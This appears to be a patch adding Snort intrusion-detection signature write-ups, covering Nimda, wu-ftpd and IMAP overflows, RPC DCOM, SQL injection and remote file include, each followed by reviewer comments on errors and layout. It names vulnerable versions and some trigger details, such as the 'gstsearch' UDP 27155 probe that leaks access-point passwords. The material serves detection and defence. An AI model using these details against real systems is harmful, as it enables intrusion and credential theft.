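Review bot: 1678.txt carries a paragraph that does not belong to it: "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit" comes from a telnet/shell-command signature and says nothing about Oracle; drop it. The Affected Systems section is missing entirely; Attack Scenarios ("Simple. These are Oracle database commands.") reads like an Ease of Attack entry and should instead describe how an attacker reaches the listener and issues the command; the $ORACLE_PORTS advice is given twice (Detailed Information and False Negatives) and should live in one place; and the Summary never says which command the rule matches. Formatting: "Sid: 1678" is on one line where every other file puts the number on its own line.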
--- /dev/null
+++ b/doc/signatures/1284.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+Sid:
+1284
+
+--
+
+Summary:
+This event is generated when an attempt is made to download a
+Nimda-infected attachment from a web server.
+
+--
+Impact:
+Serious. A Nimda-infected web server may have spread the Nimda worm to the web
+client.
+
+--
+Detailed Information:
+One of the methods the Nimda worm uses to propagate is by passing malicious
+code from an infected web server to a web client.  The Nimda-infected
+code often uses the filename extension ".EML".
+
+The fully automated Nimda worm that has already infected an IIS web server
+searches through and infects the local web pages with malicious javascript.
+When a vulnerable web client attempts to load a web page from this server,
+the javascript will cause the web client to download and execute the
+Nimda-infected readme.eml file, causing the web client to become
+Nimda-infected.
+
+--
+Affected Systems:
+	Microsoft Windows based systems.
+
+--
+Attack Scenarios:
+The user must use a link on an infected server.
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+The Nimda worm may spread via any file with the .EML or .NWS extension, not
+just readme.eml.  This rule will not catch other .EML or .NWS files.
+
+--
+Corrective Action:
+Examine the host for signs of infection.
+
+Use Anti-Virus tools to clean an infected host.
+
+Consider the use of alternative operating systems that are not
+vulnerable to this kind of attack.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
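Review bot: the section layout in this file diverges from the rest of the patch: "Rule:" carries trailing spaces and is not followed by a "--" separator before "Sid:", and the final section is titled "References:" where the other files use "Additional References:". In Contributors, "unkown" should be "unknown". The References section is empty although Detailed Information names a specific worm and a specific file (readme.eml); a pointer to an advisory on Nimda would let an analyst confirm the indicator.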
--- /dev/null
+++ b/doc/signatures/1903.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1903
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP RENAME
+command with a malformed argument to an internal IMAP server port. This
+may indicate an attempt to exploit a buffer overflow vulnerability in
+the IMAP RENAME command.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a RENAME command with a malformed and overly long argument is sent
+to a vulnerable IMAP server, a buffer overflow condition may occur. This
+can allow an attacker to execute arbitrary code from the command shell.
+Note that this exploit can only be attempted by a user with a valid IMAP
+account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long RENAME command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
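Review bot: the requirement for a valid IMAP account is stated three times (Impact, Detailed Information, Ease of Attack); keep it once, in Impact, and trim the others. Affected Systems names exact versions (University of Washington imapd 10.234 or 12.264) and Corrective Action says "Apply the patch for your current version of imapd", yet Additional References is empty; add the advisory those versions come from so the reader can locate the patch.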
--- /dev/null
+++ b/doc/signatures/352.txt
@@ -0,0 +1,64 @@
+SID:
+352
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated 
+user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+	NcFTP Software NcFTPD 2.3.5
+	Washington University wu-ftpd 2.4.2 (beta 18) VR10 RedHat wu-ftpd 2.4.2 b18-2 
+	Washington University wu-ftpd 2.4.2 academ[BETA-18]
+	Probably others as well, suspect anything under 
+	Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
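Review bot: several errors in Detailed Information and Attack Scenarios: "very log directory names" should read "very long directory names", "insufficent" should be "insufficient", "stack.This" needs a space, and "wich" should be "which"; Ease of Attack "simple, Exploit code exists" should be "Simple. Exploit code exists." to match the other files. The file also orders its sections SID then Rule, places the "--" separator before the blank line rather than after it, and titles the last section "References:"; the other signature files use Rule, Sid and "Additional References:". Corrective Action writes "wuftpd" where the rest of the file uses "wu-ftpd".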
--- /dev/null
+++ b/doc/signatures/2391.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2391
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd APPE command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the APPE command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the APPE 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
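Review bot: Affected Systems lists "Multiple systems using affected C libraries, libc" while the Summary attributes the overflow to the WuFtpd APPE command; since Detailed Information places the bug in realpath(), state which wu-ftpd versions (or which libc versions, if that is the intent) are affected, otherwise the reader cannot tell whether upgrading the FTP daemon or relinking against libc fixes it, and Corrective Action currently advises both. The last three Corrective Action lines lack terminating periods, and Additional References is empty.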
--- /dev/null
+++ b/doc/signatures/2002.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2002
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in php applications.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the php application on the host. The attacker might then gain administrator access to the site or database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
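Review bot: the document never says what the rule matches: Summary ("a weakness in a php application") and Detailed Information give no file, path or request pattern, and Attack Scenarios only says "a sensitive file containing information on the php application", so an analyst cannot tell a true hit from noise. Name the requested file or URI the rule keys on in the Summary, and name it again in Corrective Action, where "deny access to sensitive files" should say which file. Additional References is empty and is followed by two blank lines where the other files use one.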
--- /dev/null
+++ b/doc/signatures/475.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+
+Sid:
+475
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP datagram
+with Record Route IP options.
+
+--
+
+Impact:
+Packets containing IP Record Route options are used to emulate the functionality
+of traceroute. 
+
+--
+
+Detailed Information:
+The Record Route IP option is used to store routing information about the
+path a datagram takes to its destination.  ICMP ECHO packets with an IP header
+utilizing the Record Route option are used to emulate the functionality of
+traceroute.
+
+--
+
+Attack Scenarios:
+A remote attacker may attempt to use the Record Route IP option to determine
+routing information if traceroute fails.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of datagram.
+
+--
+
+False Positives:
+Network diagnostic tools may generate these types of datagrams.
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to block incoming datagrams with the IP Record Route option.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS238
+
+
+--
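Review bot: the Impact section describes what Record Route packets are for ("used to emulate the functionality of traceroute") rather than the impact, which Attack Scenarios already implies: disclosure of internal routing information to a remote party. Reword Impact to state that. The Affected Systems section present in every other file in this patch is missing here; even "All" would keep the layout uniform. The "--" after False Negatives (following "None known") lacks the blank line used everywhere else in the file.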
--- /dev/null
+++ b/doc/signatures/2977.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2977
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
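Review bot: Corrective Action only blocks NetBIOS session traffic ("tcp port 139"), while Detailed Information says any holder of administrative rights can reach the share remotely; 3333.txt in this same patch blocks 139 and 445 together, and the same applies here since Windows hosts also serve file shares directly over TCP 445. Suggest "Disallow NetBIOS and SMB access from external networks (TCP ports 139 and 445)." Also "Netbios" should be written "NetBIOS", and the separator before Additional References carries trailing whitespace.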
--- /dev/null
+++ b/doc/signatures/524.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 524
+
+--
+Summary:
+This event is generated when TCP traffic to port 0 is detected. This 
+should not be seen in normal TCP communications.
+
+--
+Impact:
+Possible reconnaisance. This may be an attempt to verify the existance 
+of a host or hosts at a particular address or address range.
+
+--
+Detailed Information:
+TCP traffic to port 0 is not valid under normal circumstances.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker could send packets to a host with a destination port of 0. 
+The attacker might also be using hping to verify the existance of a host
+as a prelude to an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow TCP traffic to port 0.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
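Review bot: the second paragraph of Detailed Information is a sentence fragment: "an indicator of unauthorized network use, reconnaisance activity or system compromise" has lost its subject and should read "This may be an indicator of unauthorized network use, reconnaissance activity or system compromise." Spelling: "reconnaisance" (twice) should be "reconnaissance" and "existance" (twice) should be "existence". "Sid: 524" is on one line here but split over two lines in most other files in the patch.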
--- /dev/null
+++ b/doc/signatures/1105.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1105
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
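Review bot: as with 2002.txt, the text never identifies what request content the rule looks for; Summary and Detailed Information are generic ("a known vulnerability on a web server") and would fit any web rule. Add the URI or pattern the rule keys on. Impact: "attackers choosing" should be "attacker's choosing". The Summary, Impact and Detailed Information lines end in trailing whitespace.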
--- /dev/null
+++ b/doc/signatures/115-1.txt
@@ -0,0 +1,71 @@
+
+
+Rule:
+
+--
+Sid:
+115-1
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an indefinite asn.1
+length encoding was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+Indefinite Lengths are conceptually like BLOB data.  The upper bit of
+the first byte is set to one, and the bottom seven bits are zero.  The
+data value follows immediately, and continues until two zero-bytes are
+encountered.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
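Review bot: the Attack Scenarios section is empty, and Ease of Attack says "Simple." while Impact says "Unknown."; either fill Attack Scenarios with what an indefinite-length encoding is used for in an attack or mark Ease of Attack unknown as well. Affected Systems "All." is not informative for a preprocessor event; say which decoders the asn1 preprocessor covers, or point to README.asn1 here too. Detailed Information: "consititute" should be "constitute". The file begins with two blank lines before "Rule:", unlike most files in the patch.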
--- /dev/null
+++ b/doc/signatures/3333.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3333
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
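Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not connect with Detailed Information, which describes a malformed RPC request to an RPC port; state how the long filename reaches the DCOM RPC interface, or align the two sections. Ease of Attack: "Expoit" should be "Exploit". Additional References is empty even though Corrective Action tells the reader to apply the vendor patch; 3003.txt in this patch cites the Microsoft bulletin for its issue, and the same should be done here.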
--- /dev/null
+++ b/doc/signatures/2179.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+
+Sid:
+2179
+
+--
+
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an FTP server during authentication.
+
+--
+
+Impact:
+Attempted Admin.  A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the FTP daemon.
+
+--
+
+Detailed Information:
+Several FTP daemons are vulnerable to format string exploits during
+authentication to the FTP server.  A successful exploit attempt could 
+result in the remote attacker gaining unauthorized root access to the 
+vulnerable system.
+
+--
+Affected Systems:
+	SmallFTP v0.99
+
+--
+
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+Ease of Attack:
+Simple. Numerous attack scripts exist to exploit this vulnerabiliy.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+SmallFTPD has released an updated software package that resolve the 
+problem. It can be downloaded from:
+http://smallftpd.free.fr
+
+--
+
+Contributors:
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.securityfocus.com/bid/7474
+
+--
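Review bot: Impact and Detailed Information disagree on the privilege gained: Impact says "the same privileges as the user running the FTP daemon", Detailed Information says "unauthorized root access"; the first is the accurate general statement, so change the second to match. Detailed Information also says "Several FTP daemons are vulnerable" but Affected Systems lists only SmallFTP v0.99; list the others or drop "several". Typos: "an gain" should be "and gain", "vulnerabiliy" should be "vulnerability", "resolve the problem" should be "resolves the problem". The blank line after "--" is missing before Affected Systems and before Ease of Attack, unlike the rest of the file.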
--- /dev/null
+++ b/doc/signatures/1966.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1966
+
+--
+Summary:
+This event is generated when an attempt is made to discover sensitive information associated with a Global Sun Technology wireless access point. 
+
+--
+Impact:
+Information disclosure.  A successful attack may return the administrative password along with other sensitive information about a wireless access point. 
+
+--
+Detailed Information:
+Global Sun Technology Inc. is a developer of Wireless Access Points for wireless vendors such as Wisecom, D-Link, as well as others.  There is a flaw in the code distributed by Global Sun Technology that allows an attacker to send a packet to UDP port 27155 with a string of "gstsearch" in the payload to the wireless access point, returning the Wired Equivalent Privacy (WEP) encryption keys, the MAC adress, and the administrative password. 
+
+--
+Affected Systems:
+
+  WISECOM GL2422AP-0T
+  D-Link DWL-900AP+ B1 version 2.1 and 2.2
+  ALLOY GL-2422AP-S
+  EUSSO GL2422-AP
+  LINKSYS WAP11-V2.2
+  DI-614+ Firmware version 2.03
+
+--
+Attack Scenarios:
+An attacker may use this exploit to obtain valuable information about the administration of the access point as a precursor for attempting to take control and administer the access point. 
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the most current version of firmware for the access point.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6100
+
+
+--
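Review bot: the Affected Systems entry "DI-614+ Firmware version 2.03" lacks a vendor name, unlike the other entries; it belongs with the D-Link line above it. Spelling: "MAC adress" should be "MAC address". Summary, Impact, Detailed Information and Attack Scenarios are single unwrapped lines, while the rest of the patch wraps at roughly 72 columns; wrapping would keep the documentation consistent. Additional References is followed by two blank lines before the closing separator.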
--- /dev/null
+++ b/doc/signatures/2166.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2166
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
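Review bot: Detailed Information says the rule fires on "a filename extension commonly used by viruses" without saying which extension; the extension is the only thing an analyst can use to judge the hit and the False Positives entry, so name it. Impact: "An virus" should be "A virus", "propogate" should be "propagate". There is a doubled blank line after the Sid value and another at the end of Additional References.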
--- /dev/null
+++ b/doc/signatures/3003.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+3003
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the Microsoft implementation of
+the ASN.1 Library. It may be possible for an attacker to exploit this
+condition by sending specially crafted authentication packets to a host
+running a vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
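Review bot: the Attack Scenarios section is missing entirely (Affected Systems goes straight to Ease of Attack), and the last section is titled "References:" rather than "Additional References:" as in the other files. Detailed Information: "taget" should be "target", "excuted" should be "executed". "Rule:" has trailing whitespace.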
--- /dev/null
+++ b/doc/signatures/2392.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2392
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd RETR command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the RETR command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the RETR 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
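Review bot: this file is a copy of 2391.txt with APPE changed to RETR, so the same points apply: Affected Systems ("Multiple systems using affected C libraries, libc") should name the wu-ftpd or libc versions involved, since Detailed Information places the bug in realpath() and Corrective Action advises both upgrading the daemon and relinking against libc; the last three Corrective Action lines lack periods; Additional References is empty.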
--- /dev/null
+++ b/doc/signatures/100000772.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000772
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "DokiWiki" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "DokiWiki" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
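Review bot: the third paragraph of Detailed Information is boilerplate about validating client credentials that does not describe SQL injection and duplicates the generic text used in 100000724.txt; the second paragraph already covers the actual impact. Since Attack Scenarios names the cause ("user input is not correctly sanitized or checked before passing that input to the database"), Corrective Action should say so too rather than only "up to date version": validating the "DokiWiki" parameter and using parameterized queries in the "index.php" handler is the fix. Typos: "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing". The file starts with two blank lines and ends with a stray blank line after the closing separator.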
--- /dev/null
+++ b/doc/signatures/100000724.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000724
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "profile.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "profile.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
